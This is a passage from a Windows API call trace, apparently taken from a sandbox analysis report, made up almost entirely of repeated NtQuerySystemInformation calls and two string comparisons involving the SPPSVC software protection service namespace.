(SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0229.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0229.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0229.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0229.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0229.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0229.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0229.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0229.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x38, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x20, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.545] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd498, Length=0x50, ResultLength=0x0) [0229.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.546] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0229.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0229.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0229.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0229.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0229.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x28, ResultLength=0x0) [0229.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0229.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x28, ResultLength=0x0) [0229.551] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x28, ResultLength=0x0) [0229.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0229.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x20, ResultLength=0x0) [0229.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0229.552] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0229.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0229.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x38, ResultLength=0x0) [0229.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x20, ResultLength=0x0) [0229.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0229.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0229.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x50, ResultLength=0x0) [0229.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0229.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0229.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0229.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.556] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0229.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0229.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x28, ResultLength=0x0) [0229.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0229.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0229.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd190, Length=0x28, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x20, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x38, ResultLength=0x0) [0229.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x20, ResultLength=0x0) [0229.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0229.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0229.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.561] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.561] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd328, Length=0x50, ResultLength=0x0) [0229.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.562] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x28, ResultLength=0x0) [0229.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0229.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0229.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0229.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0229.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0229.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0229.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0229.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0229.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd630, Length=0x28, ResultLength=0x0) [0229.570] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0229.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0229.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6b0, Length=0x50, ResultLength=0x0) [0229.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0229.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0229.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0229.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x28, ResultLength=0x0) [0229.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd480, Length=0x28, ResultLength=0x0) [0229.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0229.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0229.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd500, Length=0x28, ResultLength=0x0) [0229.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5e0, Length=0x38, ResultLength=0x0) [0229.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x20, ResultLength=0x0) [0229.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0229.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3e0, Length=0x20, ResultLength=0x0) [0229.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.577] 